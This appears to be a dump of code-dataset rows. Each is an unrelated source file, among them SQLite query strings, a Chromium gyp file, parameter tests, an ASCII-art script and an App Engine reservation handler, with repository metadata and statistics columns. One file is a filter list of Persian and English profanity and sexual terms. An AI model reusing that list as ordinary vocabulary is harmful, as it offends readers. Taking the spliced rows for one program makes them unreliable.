In [44]: %timeit -n1 -r1 Q = scipy.linalg.solve_triangular(cholB, X.T, lower=True)
1 loops, best of 1: 790 ms per loop
In [45]: %timeit -n1 -r1 Q = scipy.linalg.solve_triangular(cholB, X.T, lower=True)
1 loops, best of 1: 799 ms per loop
In [46]: %timeit -n1 -r1 Q = scipy.linalg.solve(cholB, X.T)
1 loops, best of 1: 1.26 s per loop
In [47]: %timeit -n1 -r1 Q = scipy.linalg.solve(cholB, X.T)
1 loops, best of 1: 1.26 s per loop
"""
| 30.66055 | 102 | 0.620586 | 515 | 3,342 | 3.930097 | 0.215534 | 0.059783 | 0.038043 | 0.075593 | 0.681324 | 0.654644 | 0.61166 | 0.61166 | 0.523715 | 0.523715 | 0 | 0.030123 | 0.245063 | 3,342 | 108 | 103 | 30.944444 | 0.772097 | 0 | 0 | 0.25 | 0 | 0 | 0.057427 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.073529 | null | null | 0.088235 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ce8f967c1a3e2320cb9057b9e55d32dfed9aae91 | 2,019 | py | Python | app/python/query_strings.py | ProfessorUdGuru/toykinter | 66c0a9877df6b4b3034125566e687b7361085d2b | [
"Unlicense"
] | null | null | null | app/python/query_strings.py | ProfessorUdGuru/toykinter | 66c0a9877df6b4b3034125566e687b7361085d2b | [
"Unlicense"
] | null | null | null | app/python/query_strings.py | ProfessorUdGuru/toykinter | 66c0a9877df6b4b3034125566e687b7361085d2b | [
"Unlicense"
] | null | null | null | # query_strings.py
'''
Since Sqlite queries are inserted as string in Python code,
the queries can be stored here to save space in the modules
where they are used.
'''
delete_color_scheme = '''
DELETE FROM color_scheme
WHERE color_scheme_id = ?
'''
insert_color_scheme = '''
INSERT INTO color_scheme
VALUES (null, ?, ?, ?, ?, 0, 0)
'''
select_all_color_schemes = '''
SELECT bg, highlight_bg, head_bg, fg
FROM color_scheme
'''
select_all_color_schemes_plus = '''
SELECT bg, highlight_bg, head_bg, fg, built_in, color_scheme_id
FROM color_scheme
'''
select_color_scheme_current = '''
SELECT bg, highlight_bg, head_bg, fg
FROM format
WHERE format_id = 1
'''
select_current_database = '''
SELECT current_database
FROM closing_state
WHERE closing_state_id = 1
'''
select_font_scheme = '''
SELECT font_size, output_font, input_font
FROM format
WHERE format_id = 1
'''
select_opening_settings = '''
SELECT
bg,
highlight_bg,
head_bg,
fg,
output_font,
input_font,
font_size,
default_bg,
default_highlight_bg,
default_head_bg,
default_fg,
default_output_font,
default_input_font,
default_font_size
FROM format
WHERE format_id = 1
'''
update_color_scheme_null = '''
UPDATE format
SET (bg, highlight_bg, head_bg, fg) =
(null, null, null, null)
WHERE format_id = 1
'''
update_current_database = '''
UPDATE closing_state
SET current_database = ?
WHERE closing_state_id = 1
'''
update_format_color_scheme = '''
UPDATE format
SET (bg, highlight_bg, head_bg, fg) = (?, ?, ?, ?)
WHERE format_id = 1
'''
update_format_fonts = '''
UPDATE format
SET (font_size, output_font, input_font) = (?, ?, ?)
WHERE format_id = 1
'''
| 20.393939 | 69 | 0.595344 | 241 | 2,019 | 4.626556 | 0.248963 | 0.10852 | 0.069955 | 0.09148 | 0.365919 | 0.288789 | 0.218834 | 0.120179 | 0.064574 | 0 | 0 | 0.007225 | 0.314512 | 2,019 | 98 | 70 | 20.602041 | 0.79841 | 0.078257 | 0 | 0.422535 | 0 | 0 | 0.765043 | 0.012034 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ce90ad08ae1e89a4b497c7dcbd24f5d92a0ba879 | 428 | py | Python | travel/migrations/0029_auto_20190514_2108.py | sausage-team/travel-notes | 3c2454ebad7764906c5ff30cbdfe296cb7c64eb4 | [
"MIT"
] | null | null | null | travel/migrations/0029_auto_20190514_2108.py | sausage-team/travel-notes | 3c2454ebad7764906c5ff30cbdfe296cb7c64eb4 | [
"MIT"
] | null | null | null | travel/migrations/0029_auto_20190514_2108.py | sausage-team/travel-notes | 3c2454ebad7764906c5ff30cbdfe296cb7c64eb4 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.1 on 2019-05-14 13:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('travel', '0028_auto_20190514_1929'),
]
operations = [
migrations.AlterField(
model_name='user',
name='uid',
field=models.CharField(default='b8554d6d-264a-4ce7-bd9b-a2e1e218a13d', max_length=40),
),
]
| 22.526316 | 98 | 0.616822 | 48 | 428 | 5.395833 | 0.854167 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.161392 | 0.261682 | 428 | 18 | 99 | 23.777778 | 0.658228 | 0.10514 | 0 | 0 | 1 | 0 | 0.188976 | 0.154856 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ce9550e5fc7912aecc7ac103430d2e2845e818b7 | 12,566 | gyp | Python | ui/gfx/gfx.gyp | cvsuser-chromium/chromium | acb8e8e4a7157005f527905b48dd48ddaa3b863a | [
"BSD-3-Clause"
] | 4 | 2017-04-05T01:51:34.000Z | 2018-02-15T03:11:54.000Z | ui/gfx/gfx.gyp | cvsuser-chromium/chromium | acb8e8e4a7157005f527905b48dd48ddaa3b863a | [
"BSD-3-Clause"
] | 1 | 2021-12-13T19:44:12.000Z | 2021-12-13T19:44:12.000Z | ui/gfx/gfx.gyp | cvsuser-chromium/chromium | acb8e8e4a7157005f527905b48dd48ddaa3b863a | [
"BSD-3-Clause"
] | 4 | 2017-04-05T01:52:03.000Z | 2022-02-13T17:58:45.000Z | # Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'variables': {
'chromium_code': 1,
},
'targets': [
{
'target_name': 'gfx',
'type': '<(component)',
'dependencies': [
'<(DEPTH)/base/base.gyp:base',
'<(DEPTH)/base/base.gyp:base_i18n',
'<(DEPTH)/base/base.gyp:base_static',
'<(DEPTH)/base/third_party/dynamic_annotations/dynamic_annotations.gyp:dynamic_annotations',
'<(DEPTH)/net/net.gyp:net',
'<(DEPTH)/skia/skia.gyp:skia',
'<(DEPTH)/third_party/icu/icu.gyp:icui18n',
'<(DEPTH)/third_party/icu/icu.gyp:icuuc',
'<(DEPTH)/third_party/libpng/libpng.gyp:libpng',
'<(DEPTH)/third_party/zlib/zlib.gyp:zlib',
'<(DEPTH)/url/url.gyp:url_lib',
],
# text_elider.h includes ICU headers.
'export_dependent_settings': [
'<(DEPTH)/skia/skia.gyp:skia',
'<(DEPTH)/third_party/icu/icu.gyp:icui18n',
'<(DEPTH)/third_party/icu/icu.gyp:icuuc',
],
'defines': [
'GFX_IMPLEMENTATION',
],
'sources': [
'android/device_display_info.cc',
'android/device_display_info.h',
'android/gfx_jni_registrar.cc',
'android/gfx_jni_registrar.h',
'android/java_bitmap.cc',
'android/java_bitmap.h',
'android/shared_device_display_info.cc',
'android/shared_device_display_info.h',
'animation/animation.cc',
'animation/animation.h',
'animation/animation_container.cc',
'animation/animation_container.h',
'animation/animation_container_element.h',
'animation/animation_container_observer.h',
'animation/animation_delegate.h',
'animation/linear_animation.cc',
'animation/linear_animation.h',
'animation/multi_animation.cc',
'animation/multi_animation.h',
'animation/slide_animation.cc',
'animation/slide_animation.h',
'animation/throb_animation.cc',
'animation/throb_animation.h',
'animation/tween.cc',
'animation/tween.h',
'blit.cc',
'blit.h',
'box_f.cc',
'box_f.h',
'break_list.h',
'canvas.cc',
'canvas.h',
'canvas_android.cc',
'canvas_paint_gtk.cc',
'canvas_paint_gtk.h',
'canvas_paint_mac.h',
'canvas_paint_mac.mm',
'canvas_paint_win.cc',
'canvas_paint_win.h',
'canvas_skia.cc',
'canvas_skia_paint.h',
'codec/jpeg_codec.cc',
'codec/jpeg_codec.h',
'codec/png_codec.cc',
'codec/png_codec.h',
'color_analysis.cc',
'color_analysis.h',
'color_profile.cc',
'color_profile.h',
'color_profile_mac.cc',
'color_profile_win.cc',
'color_utils.cc',
'color_utils.h',
'display.cc',
'display.h',
'display_observer.cc',
'display_observer.h',
'favicon_size.cc',
'favicon_size.h',
'frame_time.h',
'font.cc',
'font.h',
'font_fallback_win.cc',
'font_fallback_win.h',
'font_list.cc',
'font_list.h',
'font_render_params_android.cc',
'font_render_params_linux.cc',
'font_render_params_linux.h',
'font_smoothing_win.cc',
'font_smoothing_win.h',
'gfx_export.h',
'gfx_paths.cc',
'gfx_paths.h',
'gpu_memory_buffer.cc',
'gpu_memory_buffer.h',
'image/canvas_image_source.cc',
'image/canvas_image_source.h',
'image/image.cc',
'image/image.h',
'image/image_family.cc',
'image/image_family.h',
'image/image_ios.mm',
'image/image_mac.mm',
'image/image_png_rep.cc',
'image/image_png_rep.h',
'image/image_skia.cc',
'image/image_skia.h',
'image/image_skia_operations.cc',
'image/image_skia_operations.h',
'image/image_skia_rep.cc',
'image/image_skia_rep.h',
'image/image_skia_source.h',
'image/image_skia_util_ios.h',
'image/image_skia_util_ios.mm',
'image/image_skia_util_mac.h',
'image/image_skia_util_mac.mm',
'image/image_util.cc',
'image/image_util.h',
'image/image_util_ios.mm',
'insets.cc',
'insets.h',
'insets_base.h',
'insets_f.cc',
'insets_f.h',
'interpolated_transform.cc',
'interpolated_transform.h',
'mac/scoped_ns_disable_screen_updates.h',
'matrix3_f.cc',
'matrix3_f.h',
'native_widget_types.h',
'ozone/dri/dri_skbitmap.cc',
'ozone/dri/dri_skbitmap.h',
'ozone/dri/dri_surface.cc',
'ozone/dri/dri_surface.h',
'ozone/dri/dri_surface_factory.cc',
'ozone/dri/dri_surface_factory.h',
'ozone/dri/dri_wrapper.cc',
'ozone/dri/dri_wrapper.h',
'ozone/dri/hardware_display_controller.cc',
'ozone/dri/hardware_display_controller.h',
'ozone/impl/file_surface_factory.cc',
'ozone/impl/file_surface_factory.h',
'ozone/surface_factory_ozone.cc',
'ozone/surface_factory_ozone.h',
'pango_util.cc',
'pango_util.h',
'path.cc',
'path.h',
'path_aura.cc',
'path_gtk.cc',
'path_win.cc',
'path_win.h',
'path_x11.cc',
'path_x11.h',
'platform_font.h',
'platform_font_android.cc',
'platform_font_ios.h',
'platform_font_ios.mm',
'platform_font_mac.h',
'platform_font_mac.mm',
'platform_font_ozone.cc',
'platform_font_pango.cc',
'platform_font_pango.h',
'platform_font_win.cc',
'platform_font_win.h',
'point.cc',
'point.h',
'point3_f.cc',
'point3_f.h',
'point_base.h',
'point_conversions.cc',
'point_conversions.h',
'point_f.cc',
'point_f.h',
'quad_f.cc',
'quad_f.h',
'range/range.cc',
'range/range.h',
'range/range_mac.mm',
'range/range_win.cc',
'rect.cc',
'rect.h',
'rect_base.h',
'rect_base_impl.h',
'rect_conversions.cc',
'rect_conversions.h',
'rect_f.cc',
'rect_f.h',
'render_text.cc',
'render_text.h',
'render_text_mac.cc',
'render_text_mac.h',
'render_text_ozone.cc',
'render_text_pango.cc',
'render_text_pango.h',
'render_text_win.cc',
'render_text_win.h',
'safe_integer_conversions.h',
'scoped_canvas.h',
'scoped_cg_context_save_gstate_mac.h',
'scoped_ns_graphics_context_save_gstate_mac.h',
'scoped_ns_graphics_context_save_gstate_mac.mm',
'scoped_ui_graphics_push_context_ios.h',
'scoped_ui_graphics_push_context_ios.mm',
'screen.cc',
'screen.h',
'screen_android.cc',
'screen_aura.cc',
'screen_gtk.cc',
'screen_ios.mm',
'screen_mac.mm',
'screen_win.cc',
'screen_win.h',
'scrollbar_size.cc',
'scrollbar_size.h',
'selection_model.cc',
'selection_model.h',
'sequential_id_generator.cc',
'sequential_id_generator.h',
'shadow_value.cc',
'shadow_value.h',
'size.cc',
'size.h',
'size_base.h',
'size_conversions.cc',
'size_conversions.h',
'size_f.cc',
'size_f.h',
'skbitmap_operations.cc',
'skbitmap_operations.h',
'skia_util.cc',
'skia_util.h',
'skia_utils_gtk.cc',
'skia_utils_gtk.h',
'switches.cc',
'switches.h',
'sys_color_change_listener.cc',
'sys_color_change_listener.h',
'text_constants.h',
'text_elider.cc',
'text_elider.h',
'text_utils.cc',
'text_utils.h',
'text_utils_android.cc',
'text_utils_ios.mm',
'text_utils_skia.cc',
'transform.cc',
'transform.h',
'transform_util.cc',
'transform_util.h',
'utf16_indexing.cc',
'utf16_indexing.h',
'vector2d.cc',
'vector2d.h',
'vector2d_conversions.cc',
'vector2d_conversions.h',
'vector2d_f.cc',
'vector2d_f.h',
'vector3d_f.cc',
'vector3d_f.h',
'win/dpi.cc',
'win/dpi.h',
'win/hwnd_util.cc',
'win/hwnd_util.h',
'win/scoped_set_map_mode.h',
'win/singleton_hwnd.cc',
'win/singleton_hwnd.h',
'win/window_impl.cc',
'win/window_impl.h',
'x/x11_atom_cache.cc',
'x/x11_atom_cache.h',
'x/x11_types.cc',
'x/x11_types.h',
],
'conditions': [
['OS=="ios"', {
# iOS only uses a subset of UI.
'sources/': [
['exclude', '^codec/jpeg_codec\\.cc$'],
],
}, {
'dependencies': [
'<(libjpeg_gyp_path):libjpeg',
],
}],
# TODO(asvitkine): Switch all platforms to use canvas_skia.cc.
# http://crbug.com/105550
['use_canvas_skia==1', {
'sources!': [
'canvas_android.cc',
],
}, { # use_canvas_skia!=1
'sources!': [
'canvas_skia.cc',
],
}],
['toolkit_uses_gtk == 1', {
'dependencies': [
'<(DEPTH)/build/linux/system.gyp:gtk',
],
'sources': [
'gtk_native_view_id_manager.cc',
'gtk_native_view_id_manager.h',
'gtk_preserve_window.cc',
'gtk_preserve_window.h',
'gdk_compat.h',
'gtk_compat.h',
'gtk_util.cc',
'gtk_util.h',
'image/cairo_cached_surface.cc',
'image/cairo_cached_surface.h',
'scoped_gobject.h',
],
}],
['OS=="win"', {
'sources': [
'gdi_util.cc',
'gdi_util.h',
'icon_util.cc',
'icon_util.h',
],
# TODO(jschuh): C4267: http://crbug.com/167187 size_t -> int
# C4324 is structure was padded due to __declspec(align()), which is
# uninteresting.
'msvs_disabled_warnings': [ 4267, 4324 ],
}],
['OS=="android"', {
'sources!': [
'animation/throb_animation.cc',
'display_observer.cc',
'path.cc',
'selection_model.cc',
],
'dependencies': [
'gfx_jni_headers',
],
'link_settings': {
'libraries': [
'-landroid',
'-ljnigraphics',
],
},
}],
['OS=="android" and android_webview_build==0', {
'dependencies': [
'<(DEPTH)/base/base.gyp:base_java',
],
}],
['OS=="android" or OS=="ios"', {
'sources!': [
'render_text.cc',
'render_text.h',
'text_utils_skia.cc',
],
}],
['use_pango==1', {
'dependencies': [
'<(DEPTH)/build/linux/system.gyp:pangocairo',
],
}],
['ozone_platform_dri==1', {
'dependencies': [
'<(DEPTH)/build/linux/system.gyp:dridrm',
],
}],
],
'target_conditions': [
# Need 'target_conditions' to override default filename_rules to include
# the file on iOS.
['OS == "ios"', {
'sources/': [
['include', '^scoped_cg_context_save_gstate_mac\\.h$'],
],
}],
],
}
],
'conditions': [
['OS=="android"' , {
'targets': [
{
'target_name': 'gfx_jni_headers',
'type': 'none',
'direct_dependent_settings': {
'include_dirs': [
'<(SHARED_INTERMEDIATE_DIR)/ui/gfx',
],
},
'sources': [
'../android/java/src/org/chromium/ui/gfx/BitmapHelper.java',
'../android/java/src/org/chromium/ui/gfx/DeviceDisplayInfo.java',
],
'variables': {
'jni_gen_package': 'ui/gfx',
'jni_generator_ptr_type': 'long',
},
'includes': [ '../../build/jni_generator.gypi' ],
},
],
}],
],
}
| 29.990453 | 100 | 0.524988 | 1,392 | 12,566 | 4.427443 | 0.193966 | 0.035697 | 0.019633 | 0.017037 | 0.201038 | 0.118449 | 0.074963 | 0.041214 | 0.041214 | 0.041214 | 0 | 0.008554 | 0.320866 | 12,566 | 418 | 101 | 30.062201 | 0.713616 | 0.045758 | 0 | 0.222222 | 0 | 0 | 0.565584 | 0.293479 | 0 | 0 | 0 | 0.002392 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ceac7c7a86d7f596354c9e7181c0d362a2bc878a | 1,478 | py | Python | tests/test_mangling.py | ecoinvent/brightway2-parameters | 0b42466bf33655087e231364a7d677c6c114a046 | [
"BSD-3-Clause"
] | null | null | null | tests/test_mangling.py | ecoinvent/brightway2-parameters | 0b42466bf33655087e231364a7d677c6c114a046 | [
"BSD-3-Clause"
] | 1 | 2019-12-26T15:18:49.000Z | 2019-12-26T15:18:49.000Z | tests/test_mangling.py | ecoinvent/brightway2-parameters | 0b42466bf33655087e231364a7d677c6c114a046 | [
"BSD-3-Clause"
] | 1 | 2021-07-05T12:14:49.000Z | 2021-07-05T12:14:49.000Z | from bw2parameters import *
def test_mangle_formula():
    """Variables get the prefix applied unless explicitly exempted."""
    formula = "log(foo * bar) + 7 / baz"
    expected = '(log((pre__foo * bar)) + (7 / pre__baz))'
    # 'bar' is in the exemption list, so only foo and baz are prefixed.
    assert mangle_formula(formula, "pre", ['bar']) == expected
def test_prefix_parameter_dict():
    """Every key gets the prefix; formulas are rewritten to the new names.

    Keys not appearing in any formula ('catch') still get renamed, and extra
    metadata ('foo') is carried through untouched.
    """
    params = {
        'a': {'formula': 'a + b / c', 'foo': True},
        'b': {'formula': '2 * a - exp(7 - b)'},
        'catch': {}
    }
    renamed = {
        't_a': {'formula': '(t_a + (t_b / c))', 'foo': True, 'original': 'a'},
        't_b': {'formula': '((2 * t_a) - exp((7 - t_b)))', 'original': 'b'},
        't_catch': {'original': 'catch'}
    }
    mapping = {'a': 't_a', 'b': 't_b', 'catch': 't_catch'}
    assert prefix_parameter_dict(params, "t_") == (renamed, mapping)
def test_chain_prefix_parameter_dict():
    """Prefixing leaves its input unmodified, and substitutions can be chained."""
    given = {'a': {'formula': 'a + b / c'}}
    g_copy = {'a': {'formula': 'a + b / c'}}
    expected = {
        't_a': {'formula': '(t_a + (b / c))', 'original': 'a'},
    }
    substitutions = {'a': 't_a'}
    assert prefix_parameter_dict(given, "t_") == (expected, substitutions)
    # The original input dict must be left untouched by the call above.
    assert given == g_copy
    given, _ = prefix_parameter_dict(given, "t_")
    # Apply two substitutions one after another; each rewrites the formulas
    # produced by the previous step.
    s1 = {'b': 'dog'}
    r1 = substitute_in_formulas(given, s1)
    expected = {'t_a': {'formula': '(t_a + (dog / c))', 'original': 'a'}}
    assert r1 == expected
    s2 = {'c': 'cat'}
    r2 = substitute_in_formulas(r1, s2)
    expected = {'t_a': {'formula': '(t_a + (dog / cat))', 'original': 'a'}}
    assert r2 == expected
| 35.190476 | 95 | 0.525034 | 191 | 1,478 | 3.816754 | 0.21466 | 0.030178 | 0.130316 | 0.164609 | 0.400549 | 0.351166 | 0.29904 | 0.238683 | 0.096022 | 0 | 0 | 0.014286 | 0.242219 | 1,478 | 41 | 96 | 36.04878 | 0.636607 | 0 | 0 | 0.111111 | 0 | 0 | 0.275372 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0.083333 | false | 0 | 0.027778 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ceb07de7a23c054666d87af2b849db00c172593e | 819 | py | Python | Config/Texts/NFSW/NFSW.py | amiralirj/DarkHelper | 386eea58eb6b9766d6f900a83f87eeac0b8f09c2 | [
"MIT"
] | 34 | 2021-08-05T12:41:18.000Z | 2021-11-30T22:23:20.000Z | Config/Texts/NFSW/NFSW.py | amiralirj/DarkHelper | 386eea58eb6b9766d6f900a83f87eeac0b8f09c2 | [
"MIT"
] | 2 | 2021-08-29T10:32:02.000Z | 2021-08-31T12:10:29.000Z | Config/Texts/NFSW/NFSW.py | amiralirj/DarkHelper | 386eea58eb6b9766d6f900a83f87eeac0b8f09c2 | [
"MIT"
] | 5 | 2021-08-07T07:41:44.000Z | 2021-08-20T13:52:36.000Z | NFSW_Texts = [
'سکس'
,'گایید'
,' کص'
,'جنده'
,'کیر'
,'jnde'
,'jende'
,'kos'
,'pussy'
,'kir'
,'lashi'
,'لاشی'
,'jakesh'
,'جاکش'
,'مادر خراب'
,'madar kharab'
,'mde kharab'
,'khar kose'
,'fuck'
,'bitch'
,'haroomzade'
,'حرومی'
,'حرامزاده'
,'حرومزاده'
,'جندس'
,'کصه '
]
NFSW_Names=[
'خاله'
,'جنده'
,"کص"
,"کیر"
,"ساعتی"
,"اوف"
,"💦💦💦💦"
,"سوپر"
,"فیلم"
,"بیو"
,"حضوری"
,"مکان"
]
Porn={'dick':'Male Genitalia - Exposed',
'pussy':'Female Genitalia - Exposed',
'coveredpossy':'Female Genitalia - Covered',
'fboobs':'Female Breast - Exposed',
'mboobs':'Male Breast - Exposed',
'coveredboobs':'Female Breast - Covered',
'stomack':'Male Breast - Covered',
'baghal':'Male Breast - Exposed',
'ass':'Buttocks - Exposed',
'feet':'404NotFound',
'coveredass':'Buttocks - Covered'} | 14.625 | 45 | 0.577534 | 87 | 819 | 5.45977 | 0.689655 | 0.082105 | 0.071579 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004458 | 0.178266 | 819 | 56 | 46 | 14.625 | 0.695394 | 0 | 0 | 0.037736 | 0 | 0 | 0.649673 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cec69b53aae0a98c800aee68729ab0b6f22dfd50 | 1,976 | py | Python | cli/asciiart.py | Christophe1997/pyramid | d135c86329b6527d54535d95c0db8b5d2da6cc8c | [
"Apache-2.0"
] | null | null | null | cli/asciiart.py | Christophe1997/pyramid | d135c86329b6527d54535d95c0db8b5d2da6cc8c | [
"Apache-2.0"
] | null | null | null | cli/asciiart.py | Christophe1997/pyramid | d135c86329b6527d54535d95c0db8b5d2da6cc8c | [
"Apache-2.0"
] | null | null | null | #! /usr/bin/env python3
"""Convert picture to asciiArt, requrie python3.6 or higher.
Dependence:
- fire
- PIL
- numpy
Usage:
- chmod +x asciiart.py
- asciiart.py ${path_to_image} [Height] [Width]
Also, you can remove the filetype ".py" and put it to $HOME/bin/ then enjoy it:)
One example:
*&&&&&&&&&&&&&&&&&&&&&+
&&&$ &&&&&&&&&&&&&&&&&%
&&&&&%&&&&&&&&&&&&&&&&&&&$
%%%%%%%%%%%%%&&&&&&&&$$$$$
+&&&&&&&&&&&&&&&&&&&&&&&$&&&$$$$$$$$ ****** ***
&&&&&&&&&&&&&&&&&&&&&&&&&&&&$$$$$$$$$$*************
&&&&&&&&&&&&&&&&&&&&&&&&&&&$$$$$$$$$&$%*************
*&&&&&&&&&&&&&&&&&&&&&&&&&&$$$$$$$$$# ****************
+&&&&&&&&&&&&&$%**************************************
&&&&&&&&&&&&** **************************************
*&&&&&&&&&&$ ***************************************
+&&&&&&&&$ *************************************
**************************
**************************
****************** ****
+********************+
"""
import fire
from PIL import Image
import numpy as np
import sys
class AsciiArt:
    """Render an image file as ASCII art (dark pixels map to dense glyphs)."""

    DEFAULT_HEIGHT = 20
    DEFAULT_WIDTH = 60
    # Eight glyphs ordered dark -> light; index = grey level // 32.
    SYMBOL = list("@#$&%+* ")

    def draw(self, image_path, height=DEFAULT_HEIGHT, width=DEFAULT_WIDTH):
        """Return the ASCII-art string for *image_path* at the given size.

        Exits the process with status 1 if the file does not exist.
        """
        try:
            img = Image.open(image_path)
        except FileNotFoundError:
            print(f"{image_path} not exist")
            sys.exit(1)
        grey = np.array(img.resize((width, height)).convert("L"))
        img.close()
        # Bucket each 8-bit grey level (0..255) into one of 8 glyph indices.
        levels = np.floor((grey / 256) * 8)
        rows = []
        for row_index, row in enumerate(levels):
            try:
                rows.append("".join(self.SYMBOL[int(level)] for level in row) + "\n")
            except IndexError:
                print(row_index)
                sys.exit(1)
        return "".join(rows)
if __name__ == "__main__":
    # Expose AsciiArt's methods (draw) as a command-line interface via fire.
    fire.Fire(AsciiArt)
| 29.058824 | 87 | 0.34666 | 150 | 1,976 | 4.453333 | 0.573333 | 0.040419 | 0.023952 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009053 | 0.273279 | 1,976 | 67 | 88 | 29.492537 | 0.456128 | 0.551113 | 0 | 0.148148 | 0 | 0 | 0.046644 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.148148 | 0 | 0.37037 | 0.074074 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cec7fff35f1ea56bf0187cca1f5248b7d68f0fa3 | 14,729 | py | Python | main.py | ceciliazhang12/resource-reservation-system | d680582a41d39b1558b85d1e42f9006eb07caef8 | [
"Apache-2.0"
] | null | null | null | main.py | ceciliazhang12/resource-reservation-system | d680582a41d39b1558b85d1e42f9006eb07caef8 | [
"Apache-2.0"
] | null | null | null | main.py | ceciliazhang12/resource-reservation-system | d680582a41d39b1558b85d1e42f9006eb07caef8 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# [START imports]
import os
from datetime import datetime, time, timedelta
import uuid
import time as t
from google.appengine.api import users
from google.appengine.ext import ndb
from google.appengine.api import mail
import jinja2
import webapp2
from models import Resource, Reservation
from __builtin__ import True
PATH_TEMPLATE = os.path.join(os.path.dirname(__file__), 'templates')
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(PATH_TEMPLATE),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
# [END imports]
# Helper Function
def send_mail(resource, reservation):
    """Email the reserving user a confirmation for *reservation*.

    *resource* is accepted for interface compatibility with callers but is
    not currently used; all message details come from the reservation.
    """
    text = "Hi,\n\n" + "You've reserved {0} from {1} to {2}. " \
            .format(reservation.resource_name, reservation.start_time,
                    reservation.end_time)
    # NOTE: the sender must be an authorized address for this App Engine app.
    # Fixed typo in the subject line ("Confirmend." -> "Confirmed.").
    mail.send_mail(sender="yz3847@nyu.edu", to=reservation.user,
                   subject="Reservation Confirmed.", body=text)
'''
Landing Page, which displays the following 4 sections:
user login / logout link
reservations made for resources by that user (sorted by the reservation time)
all resources in the system (shown in reverse time order based on last made reservation)
resources owned by that user
a link to create a new resource
'''
class LandingPage(webapp2.RequestHandler):
    """Landing page: login link, the user's reservations, all resources
    (reverse order of last reservation), and the user's own resources."""

    def get(self):
        user = users.get_current_user()
        if user:
            url = users.create_logout_url(self.request.uri)
            url_linktext = 'Logout'
            # retrieve reservations by current user that have not yet ended
            # NOTE(review): subtracting 300 minutes looks like a UTC -> UTC-5
            # local-time adjustment -- confirm; it ignores daylight saving.
            now_time = datetime.now() - timedelta(minutes=300)
            reservation_by_curr_user = Reservation.query(ndb.AND(Reservation.user == user.email(),
                                                                 Reservation.end_time > now_time)) \
                                                                 .fetch()
            if reservation_by_curr_user:
                # Display soonest-starting reservations first.
                reservation_by_curr_user = sorted(reservation_by_curr_user, key=lambda r: r.start_time)
            # retrieve all resources in system, most recently reserved first
            sorted_resources = Resource.query().order(-Resource.last_reservation_time)
            # retrieve resources owned by current user
            resources_owned = Resource.query(Resource.owner==user.email())
            template_values = {
                'user': user,
                'reservation_by_curr_user': reservation_by_curr_user,
                'sorted_resources': sorted_resources,
                'resources_owned': resources_owned,
                'url': url,
                'url_linktext': url_linktext,
            }
            template = JINJA_ENVIRONMENT.get_template('index.html')
            self.response.write(template.render(template_values))
        else:
            # Not signed in: bounce to the Google login page.
